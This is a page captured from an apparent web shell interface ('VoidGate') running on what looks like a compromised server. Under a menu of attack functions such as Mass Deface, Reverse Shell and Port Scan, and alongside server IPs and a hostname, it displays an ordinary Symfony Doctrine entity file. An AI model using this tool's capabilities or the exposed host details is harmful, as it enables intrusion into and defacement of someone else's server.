ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
src
/
AppBundle
/
Entity
/
Viewing: TravelConfig.php
<?php namespace AppBundle\Entity; use Doctrine\ORM\Mapping as ORM; use JMS\Serializer\Annotation as Serializer; use AppBundle\Entity\LineStanding; /** * TravelConfig * * @ORM\Table(name="travel_config") * @ORM\Entity(repositoryClass="AppBundle\Repository\TravelConfigRepository") */ class TravelConfig { /** * @var int * * @ORM\Column(name="id", type="integer") * @ORM\Id * @ORM\GeneratedValue(strategy="AUTO") * @Serializer\Groups({"LIST", "TRAVEL_CONFIG_DETAILS"}) */ private $travelConfigId; /** * @var AppBundle\Entity\Schedule * * @ORM\ManyToOne(targetEntity="AppBundle\Entity\Schedule") * @ORM\JoinColumn(nullable=false) * @Serializer\Groups({"LIST","TRAVEL_CONFIG_DETAILS", "TRAVEL_DETAILS"}) * @Serializer\MaxDepth(3) */ private $schedule; /** * @ORM\Column(name="start_point", type="integer", options={"default":1}) * @Serializer\Groups({"LIST", "TRAVEL_CONFIG_DETAILS", "TRAVEL_DETAILS"}) * @Serializer\MaxDepth(1) */ private $startPoint = 1; /** * @var bool * * @ORM\Column(name="active", type="boolean", * options = { * "default" : false * } * ) * @Serializer\Groups({"TRAVEL_CONFIG_DETAILS"}) */ private $active = true; /** * @var AppBundle\Entity\LineStanding * * @ORM\ManyToOne(targetEntity="AppBundle\Entity\LineStanding") * @ORM\JoinColumn(nullable=false) * * @Serializer\Groups({"LIST","TRAVEL_CONFIG_DETAILS", "TRAVEL_DETAILS"}) * @Serializer\MaxDepth(3) */ private $lineStanding; /** * Get travelConfigId * * @return integer */ public function getTravelConfigId() { return $this->travelConfigId; } /** * Set schedule * * @param \AppBundle\Entity\Schedule $schedule * * @return TravelConfig */ public function setSchedule(\AppBundle\Entity\Schedule $schedule) { $this->schedule = $schedule; return $this; } /** * Get schedule * * @return \AppBundle\Entity\Schedule */ public function getSchedule() { return $this->schedule; } /** * Set active * * @param boolean $active * * @return TravelConfig */ public function setActive($active) { $this->active = $active; return $this; } /** * Get active * * @return boolean */ public function getActive() { return $this->active; } /** * Set startPoint. * * @param int $startPoint * * @return TravelConfig */ public function setStartPoint($startPoint) { $this->startPoint = $startPoint; return $this; } /** * Get startPoint. * * @return int */ public function getStartPoint() { return $this->startPoint; } /** * Set lineStanding * * @param \AppBundle\Entity\LineStanding $lineStanding * * @return TravelConfig */ public function setLineStanding(\AppBundle\Entity\LineStanding $lineStanding) { $this->lineStanding = $lineStanding; return $this; } /** * Get lineStanding * * @return \AppBundle\Entity\LineStanding */ public function getLineStanding() { return $this->lineStanding; } }
Coded With 💗 by
0x6ick